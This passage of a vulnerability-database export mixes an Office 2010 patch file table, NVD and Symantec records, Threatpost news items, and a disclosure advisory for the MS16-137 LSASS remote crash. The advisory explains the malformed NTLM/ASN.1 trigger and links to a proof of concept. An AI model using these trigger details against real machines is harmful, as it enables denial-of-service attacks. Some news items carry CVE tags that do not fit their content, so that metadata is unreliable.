\neqnedt32.exe_1036| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1037| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1038| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1040| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1041| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1042| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1043| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1044| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1045| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1046| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1048| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1049| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1050| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1051| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1053| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1054| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1055| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1058| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1060| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1061| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1062| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1063| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1081| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1087| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_2052| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_2070| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_2074| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_3082| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \n \n### \n\n### For all supported x64-based versions of Office 2010\n\n**Fileidentifier**| **File name**| **File version**| **File size**| **Date**| **Time** \n---|---|---|---|---|--- \neqnedt32.exe_1025| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1026| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1028| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1029| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1030| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1031| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1032| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1033| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1035| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1036| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1037| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1038| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1040| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1041| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1042| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1043| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1044| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1045| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1046| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1048| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1049| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1050| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1051| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1053| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1054| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1055| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1058| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1060| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1061| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1062| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1063| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1081| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_1087| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_2052| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_2070| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_2074| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54 \neqnedt32.exe_3082| eqnedt32.exe| 17081400| 552,680| 2-Nov-17| 7:54\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2017-11-14T08:00:00", "type": "mskb", "title": "Description of the security update for Office 2010: November 28, 2017", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882"], "modified": "2017-11-14T08:00:00", "id": "KB4011618", "href": "https://support.microsoft.com/en-us/help/4011618", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-03-14T19:29:07", "description": "Exploit for windows platform in category dos / poc", "cvss3": {}, "published": "2016-11-10T00:00:00", "type": "zdt", "title": "Microsoft Windows - LSASS SMB NTLM Exchange Null-Pointer Dereference (MS16-137) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-7237"], "modified": "2016-11-10T00:00:00", "id": "1337DAY-ID-26296", "href": "https://0day.today/exploit/description/26296", "sourceData": "MS16-137: LSASS Remote Memory Corruption Advisory\r\nTitle: LSASS SMB NTLM Exchange Remote Memory Corruption\r\nVersion: 1.0\r\nIssue type: Null Pointer Dereference\r\nAuthentication: Pre-Authenticated\r\nAffected vendor: Microsoft\r\nRelease date: 8/11/2016\r\nDiscovered by: Laurent Gaffi\u00e9\r\nAdvisory by: Laurent Gaffi\u00e9\r\nIssue status: Patch available\r\nAffected versions: Windows: XP/Server 2003, Vista, 7, 2008R2, Server 2012R2, 10. \r\n=================================================\r\n \r\nA vulnerability in Windows Local Security Authority Subsystem Service (LSASS) was found on Windows OS versions ranging from Windows XP through to Windows 10. This vulnerability allows an attacker to remotely crash the LSASS.EXE process of an affected workstation with no user interaction.\r\nSuccessful remote exploitation of this issue will result in a reboot of the target machine. Local privilege escalation should also be considered likely.\r\nMicrosoft acknowledged the vulnerability and has published an advisory and a patch, resolving this issue.\r\n \r\n \r\nTechnical details\r\n-----------------\r\n \r\nThis vulnerability affects both LSASS client and server and can be triggered remotely via SMBv1 and SMBv2, during the NTLM message 3 (Authenticate) message. Incoming NTLM messages via SMB are using ASN1 and DER encoding, the first ASN length field can be set to unsigned int by using 0x84.\r\nThis allows an attacker to remotely allocate a huge chunk of memory, for a message never larger than 20000 chars. The secondary trigger is to set any string fields (User, Domain, session Key, MIC, etc) with a long string (80-140 chars), leading LSASS.exe to crash.\r\n \r\neax=00000000 ebx=000e3e04 ecx=fffffff8 edx=fffffffc esi=000e3e00 edi=00000004\r\neip=7c84cca2 esp=00aaf9ac ebp=00aaf9d4 iopl=0 nv up ei pl nz ac po cy\r\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213\r\nntdll!RtlpWaitOnCriticalSection+0xdf:\r\n7c84cca2 ff4014 inc dword ptr [eax+14h] ds:0023:00000014=????????\r\n \r\nSTACK_TEXT: \r\n00aaf9d4 7c83cfd7 00000b3c 00000004 00000000 ntdll!RtlpWaitOnCriticalSection+0xdf\r\n00aaf9f4 4ab82f4a 000e3e00 00aafbec 00000000 ntdll!RtlEnterCriticalSection+0xa8 <-- Is used with a null pointer\r\n00aafa18 4ab82765 000e3de8 ffffffff 00000001 lsasrv!NegpBuildMechListFromCreds+0x25 <-- Uses a null creds.\r\n00aafbfc 4abc8fbb 00000001 00aafe40 000e3de8 lsasrv!NegBuildRequestToken+0xd9\r\n00aafc34 4abca13f 000e3de8 00120111 00000010 lsasrv!NegGenerateServerRequest+0x2a\r\n00aafc98 4ab85edb 000e3de8 00000000 00aafe40 lsasrv!NegAcceptLsaModeContext+0x344\r\n00aafd0c 4ab860c8 00d5f900 00d5f908 00aafe40 lsasrv!WLsaAcceptContext+0x139\r\n00aafe84 4ab7ae7b 00d5f8d8 005ccaf0 00599048 lsasrv!LpcAcceptContext+0x13b\r\n00aafe9c 4ab7ad7e 00d5f8d8 4ac22738 00d5a158 lsasrv!DispatchAPI+0x46\r\n00aaff54 4ab7a7c9 00d5f8d8 00aaff9c 77e5baf1 lsasrv!LpcHandler+0x1fe\r\n00aaff78 4ab8f448 00598ce8 00000000 00000000 lsasrv!SpmPoolThreadBase+0xb9\r\n00aaffb8 77e6484f 0059ade8 00000000 00000000 lsasrv!LsapThreadBase+0x91\r\n00aaffec 00000000 4ab8f3f1 0059ade8 00000000 kernel32!BaseThreadStart+0x34\r\n \r\ndt ntdll!_RTL_CRITICAL_SECTION\r\n +0x000 DebugInfo : Ptr32 _RTL_CRITICAL_SECTION_DEBUG\r\n +0x004 LockCount : Int4B\r\n +0x008 RecursionCount : Int4B\r\n +0x00c OwningThread : Ptr32 Void\r\n +0x010 LockSemaphore : Ptr32 Void\r\n +0x014 SpinCount : Uint4B\r\n \r\n- LSASS NegpBuildMechListFromCreds sends a null pointer \"creds\" to NTDLL RtlEnterCriticalSection.\r\n- RtlEnterCriticalSection is used with a null pointer, which triggers the crash.\r\n \r\nImpact\r\n------\r\n \r\nSuccessful attempts will result in a remote system crash and possibly local privilege escalation.\r\n \r\nAffected products\r\n-----------------\r\n \r\nWindows:\r\n- XP\r\n- Server 2003\r\n- 7\r\n- 8\r\n- 2008\r\n- 2012\r\n- 10\r\n \r\nProof of concept\r\n----------------\r\n \r\nA proof of concept is available at the following URL:\r\n \r\nhttps://github.com/lgandx/PoC/tree/master/LSASS\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40744.zip\r\n \r\nThis proof of concept is fully automated and includes non-vulnerable detection.\r\n \r\nSolution\r\n--------\r\n \r\nInstall the corresponding MS patch.\r\nMore details:\r\nhttps://technet.microsoft.com/en-us/library/security/ms16-137.aspx\r\n \r\nResponse timeline\r\n-----------------\r\n \r\n* 17/09/2016 - Vendor notified, proof of concept sent.\r\n* 28/09/2016 - Issue confirmed by MSRC\r\n* 14/10/2016 - Vendor says he plan to release a patch in November, that is 1 month in advance of the scheduled 3 month.\r\n* 08/11/2016 - Vendor release MS16-137.\r\n* 08/11/2016 - This advisory released.\r\n \r\nReferences\r\n----------\r\n* https://twitter.com/PythonResponder\r\n* https://github.com/lgandx/Responder\n\n# 0day.today [2018-03-14] #", "sourceHref": "https://0day.today/exploit/26296", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:COMPLETE/"}}], "cve": [{"lastseen": "2022-03-23T15:11:07", "description": "Local Security Authority Subsystem Service (LSASS) in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, and 1607, and Windows Server 2016 allows remote authenticated users to cause a denial of service (system hang) via a crafted request, aka \"Local Security Authority Subsystem Service Denial of Service Vulnerability.\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-11-10T06:59:00", "type": "cve", "title": "CVE-2016-7237", "cwe": ["CWE-284"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 6.8, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7237"], "modified": "2018-10-12T22:14:00", "cpe": ["cpe:/o:microsoft:windows_vista:*", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2016:*", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2008:*", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:*", "cpe:/o:microsoft:windows_10:1607"], "id": "CVE-2016-7237", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7237", "cvss": {"score": 6.8, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:*:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:*:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_vista:*:sp2:*:*:*:*:*:*"]}], "symantec": [{"lastseen": "2021-06-08T19:05:18", "description": "### Description\n\nMicrosoft Windows is prone to a denial-of-service vulnerability. An attacker can exploit this issue to cause a denial-of-service condition.\n\n### Technologies Affected\n\n * Microsoft Windows 10 Version 1607 for 32-bit Systems \n * Microsoft Windows 10 Version 1607 for x64-based Systems \n * Microsoft Windows 10 for 32-bit Systems \n * Microsoft Windows 10 for x64-based Systems \n * Microsoft Windows 10 version 1511 for 32-bit Systems \n * Microsoft Windows 10 version 1511 for x64-based Systems \n * Microsoft Windows 7 for 32-bit Systems SP1 \n * Microsoft Windows 7 for x64-based Systems SP1 \n * Microsoft Windows 8.1 for 32-bit Systems \n * Microsoft Windows 8.1 for x64-based Systems \n * Microsoft Windows RT 8.1 \n * Microsoft Windows Server 2008 R2 for Itanium-based Systems SP1 \n * Microsoft Windows Server 2008 R2 for x64-based Systems SP1 \n * Microsoft Windows Server 2008 for 32-bit Systems SP2 \n * Microsoft Windows Server 2008 for Itanium-based Systems SP2 \n * Microsoft Windows Server 2008 for x64-based Systems SP2 \n * Microsoft Windows Server 2012 \n * Microsoft Windows Server 2012 R2 \n * Microsoft Windows Server 2016 for x64-based Systems \n * Microsoft Windows Vista SP2 \n * Microsoft Windows Vista x64 Edition SP2 \n\n### Recommendations\n\n**Block external access at the network boundary, unless external parties require service.** \nIf global access isn't needed, block access at the network perimeter to computers hosting the vulnerable operating system.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity such as unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not accept or execute files from untrusted or unknown sources.** \nTo reduce the likelihood of successful exploits, never handle files that originate from unfamiliar or untrusted sources.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Do not use client software to access unknown or untrusted hosts from critical systems.** \nTo limit the risk of exploits, never connect to unknown or untrusted services.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2016-11-08T00:00:00", "type": "symantec", "title": "Microsoft Windows CVE-2016-7237 Denial of Service Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2016-7237"], "modified": "2016-11-08T00:00:00", "id": "SMNTC-94040", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/94040", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:39", "description": "", "cvss3": {}, "published": "2016-11-14T00:00:00", "type": "packetstorm", "title": "LSASS SMB NTLM Exchange Remote Memory Corruption", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-7237"], "modified": "2016-11-14T00:00:00", "id": "PACKETSTORM:139700", "href": "https://packetstormsecurity.com/files/139700/LSASS-SMB-NTLM-Exchange-Remote-Memory-Corruption.html", "sourceData": "`MS16-137: LSASS Remote Memory Corruption Advisory \nTitle: LSASS SMB NTLM Exchange Remote Memory Corruption \nVersion: 1.0 \nIssue type: Null Pointer Dereference \nAuthentication: Pre-Authenticated \nAffected vendor: Microsoft \nRelease date: 8/11/2016 \nDiscovered by: Laurent GaffiA(c) \nAdvisory by: Laurent GaffiA(c) \nIssue status: Patch available \nAffected versions: Windows: XP/Server 2003, Vista, 7, 2008R2, Server 2012R2, 10. \n================================================= \n \nA vulnerability in Windows Local Security Authority Subsystem Service (LSASS) was found on Windows OS versions ranging from Windows XP through to Windows 10. This vulnerability allows an attacker to remotely crash the LSASS.EXE process of an affected workstation with no user interaction. \nSuccessful remote exploitation of this issue will result in a reboot of the target machine. Local privilege escalation should also be considered likely. \nMicrosoft acknowledged the vulnerability and has published an advisory and a patch, resolving this issue. \n \n \nTechnical details \n----------------- \n \nThis vulnerability affects both LSASS client and server and can be triggered remotely via SMBv1 and SMBv2, during the NTLM message 3 (Authenticate) message. Incoming NTLM messages via SMB are using ASN1 and DER encoding, the first ASN length field can be set to unsigned int by using 0x84. \nThis allows an attacker to remotely allocate a huge chunk of memory, for a message never larger than 20000 chars. The secondary trigger is to set any string fields (User, Domain, session Key, MIC, etc) with a long string (80-140 chars), leading LSASS.exe to crash. \n \neax=00000000 ebx=000e3e04 ecx=fffffff8 edx=fffffffc esi=000e3e00 edi=00000004 \neip=7c84cca2 esp=00aaf9ac ebp=00aaf9d4 iopl=0 nv up ei pl nz ac po cy \ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010213 \nntdll!RtlpWaitOnCriticalSection+0xdf: \n7c84cca2 ff4014 inc dword ptr [eax+14h] ds:0023:00000014=???????? \n \nSTACK_TEXT: \n00aaf9d4 7c83cfd7 00000b3c 00000004 00000000 ntdll!RtlpWaitOnCriticalSection+0xdf \n00aaf9f4 4ab82f4a 000e3e00 00aafbec 00000000 ntdll!RtlEnterCriticalSection+0xa8 <-- Is used with a null pointer \n00aafa18 4ab82765 000e3de8 ffffffff 00000001 lsasrv!NegpBuildMechListFromCreds+0x25 <-- Uses a null creds. \n00aafbfc 4abc8fbb 00000001 00aafe40 000e3de8 lsasrv!NegBuildRequestToken+0xd9 \n00aafc34 4abca13f 000e3de8 00120111 00000010 lsasrv!NegGenerateServerRequest+0x2a \n00aafc98 4ab85edb 000e3de8 00000000 00aafe40 lsasrv!NegAcceptLsaModeContext+0x344 \n00aafd0c 4ab860c8 00d5f900 00d5f908 00aafe40 lsasrv!WLsaAcceptContext+0x139 \n00aafe84 4ab7ae7b 00d5f8d8 005ccaf0 00599048 lsasrv!LpcAcceptContext+0x13b \n00aafe9c 4ab7ad7e 00d5f8d8 4ac22738 00d5a158 lsasrv!DispatchAPI+0x46 \n00aaff54 4ab7a7c9 00d5f8d8 00aaff9c 77e5baf1 lsasrv!LpcHandler+0x1fe \n00aaff78 4ab8f448 00598ce8 00000000 00000000 lsasrv!SpmPoolThreadBase+0xb9 \n00aaffb8 77e6484f 0059ade8 00000000 00000000 lsasrv!LsapThreadBase+0x91 \n00aaffec 00000000 4ab8f3f1 0059ade8 00000000 kernel32!BaseThreadStart+0x34 \n \ndt ntdll!_RTL_CRITICAL_SECTION \n+0x000 DebugInfo : Ptr32 _RTL_CRITICAL_SECTION_DEBUG \n+0x004 LockCount : Int4B \n+0x008 RecursionCount : Int4B \n+0x00c OwningThread : Ptr32 Void \n+0x010 LockSemaphore : Ptr32 Void \n+0x014 SpinCount : Uint4B \n \n- LSASS NegpBuildMechListFromCreds sends a null pointer \"creds\" to NTDLL RtlEnterCriticalSection. \n- RtlEnterCriticalSection is used with a null pointer, which triggers the crash. \n \nImpact \n------ \n \nSuccessful attempts will result in a remote system crash and possibly local privilege escalation. \n \nAffected products \n----------------- \n \nWindows: \n- XP \n- Server 2003 \n- 7 \n- 8 \n- 2008 \n- 2012 \n- 10 \n \nProof of concept \n---------------- \n \nA proof of concept is available at the following URL: \n \nhttps://github.com/lgandx/PoC/tree/master/LSASS \nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40744.zip \n \nThis proof of concept is fully automated and includes non-vulnerable detection. \n \nSolution \n-------- \n \nInstall the corresponding MS patch. \nMore details: \nhttps://technet.microsoft.com/en-us/library/security/ms16-137.aspx \n \nResponse timeline \n----------------- \n \n* 17/09/2016 - Vendor notified, proof of concept sent. \n* 28/09/2016 - Issue confirmed by MSRC \n* 14/10/2016 - Vendor says he plan to release a patch in November, that is 1 month in advance of the scheduled 3 month. \n* 08/11/2016 - Vendor release MS16-137. \n* 08/11/2016 - This advisory released. \n \nReferences \n---------- \n* https://twitter.com/PythonResponder \n* https://github.com/lgandx/Responder \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/139700/lsass-corrupt.txt", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T23:09:29", "description": "Computerworld\u2019s Gregg Keizer brings word that this week\u2019s record-setting [batch of patches](<https://threatpost.com/microsoft-finally-shuts-door-atl-bugs-101509/>) from Microsoft actually closed the book on the vexing ATL code library issues that first surfaced in July 2009.\n\nKeizer quotes Ryan Smith, one of the hackers credited with discovering the flaw, as saying that the latest Microsoft Office updates shut the door on the last big attack vector for the ATL vulnerability. [Read the full story](<http://www.computerworld.com/s/article/9139371/Microsoft_patches_last_major_ATL_bugs?source=rss_security>) [computerworld.com]\n", "cvss3": {}, "published": "2009-10-15T14:09:39", "type": "threatpost", "title": "Microsoft Finally Shuts Door on ATL Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:41", "id": "THREATPOST:CDCABD1108763209B391D5B81AE03CF7", "href": "https://threatpost.com/microsoft-finally-shuts-door-atl-bugs-101509/72329/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:14", "description": "\n\nScott Charney used his keynote speech at the RSA Conference on Tuesday to talk up a variety of hardware and software-based technologies meant to infuse the Internet with more trust. Charney, the head of Microsoft\u2019s Trustworthy Computing team, talked about the need for greater adoption of TPMs, code signing and identity systems, all of which the company has been discussing in various forms for the better part of a decade.\n\nMany of the technologies that Charney discussed, including the TPM and code signing, were part of the company\u2019s much-maligned and controversial Palladium project. Some of the technologies have been implemented in various forms in Vista and others are still forthcoming. But Charney said Tuesday that many of the problems that plague the Internet could be addressed with better trust on the part of users, machines, vendors and other parties.\n\n\u201cWe need alignment between political, economic and social forces and IT,\u201d he said. \u201cWe need trusted people, we need to know who we\u2019re dealing with online.\u201d\n\nMany of the machines that now run Vista include a TPM, which is a hardware module used to attest to the identity of the machine, as well as serve as a sealed storage area for cryptographic keys. \u201cWe have to root trust in the hardware because it\u2019s less malleable than software,\u201d Charney said.\n\nMicrosoft also is working on some new technologies, including the [Geneva server](<http://msdn.microsoft.com/en-us/security/aa570351.aspx>) which handles identity in a claims-based manner, Charney said. \u201cThis identity metasystem is the most controversial part because of privacy concerns,\u201d he said.\n", "cvss3": {}, "published": "2009-04-21T18:54:59", "type": "threatpost", "title": "Charney plugs Microsoft end-to-end trust at RSA Conference", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:39:23", "id": "THREATPOST:6C50260122AE142A1AA28DCFDE4EA98B", "href": "https://threatpost.com/charney-plugs-microsoft-end-end-trust-rsa-conference-042109/72565/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:20", "description": "Microsoft is still hammering away at a fix for a security update released last week that caused a small number of computers to crash and blue screen.\n\n\u201cWe are aware of some issues related to the recent updates and we are working on a fix,\u201d a Microsoft representative today told Threatpost.\n\n[MS14-045](<https://technet.microsoft.com/library/security/MS14-045>) was released as part of the [August 2014 Patch Tuesday security updates](<http://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729>). It patched three vulnerabilities that could lead an attacker to elevate their privileges on a compromised Windows machine.\n\nAlmost immediately, users began reporting blue screens of death. Microsoft on Friday pulled part of the update related to a font issue that was the culprit.\n\nMicrosoft confirmed three known issues with the bulletin. The most serious occurs when systems crash with a 0x50 Stop error message after MS14-045 is installed. The two other items are related to fonts either not rendering correctly, or presenting a \u201cFile in Use\u201d error message.\n\nMicrosoft has provided a few [temporary mitigations](<http://support.microsoft.com/kb/2982791>) until the update is fixed and re-released.\n\nMS14-045 patched vulnerabilities in kernel-mode drivers that were rated important by Microsoft because they require valid credentials and local access in order to exploit.\n\nThe bugs affect Windows systems all the way back to Windows Server 2003 and all supported desktop versions of Windows.\n\nThe faulty update was one of nine bulletins released by Microsoft last week. The updates patch 26 vulnerabilities including a publicly reported bug in Internet Explorer. All of the IE bugs were rated critical and could lead to remote code execution.\n\nWindows admins have to contend with a number of upcoming changes related to IE as well. Microsoft recently also put the word out that users had [18 months to migrate to the latest version of Internet Explorer](<http://blogs.msdn.com/b/ie/archive/2014/08/07/stay-up-to-date-with-internet-explorer.aspx>) for their respective versions of Windows before support would end. That would mean no more security updates for IE 6-8, older versions of the browser that lack built-in memory protections, making it so attractive for hackers and exploits.\n\nThe company followed that up last week with news that it would begin [blocking older ActiveX controls in IE](<http://threatpost.com/microsoft-expected-to-patch-ie-8-zero-day-on-patch-tuesday/106491>), starting with outdated versions of Java. That began last Tuesday, Microsoft said.\n", "cvss3": {}, "published": "2014-08-18T15:07:27", "type": "threatpost", "title": "Microsoft to Fix Broken Patch Tuesday 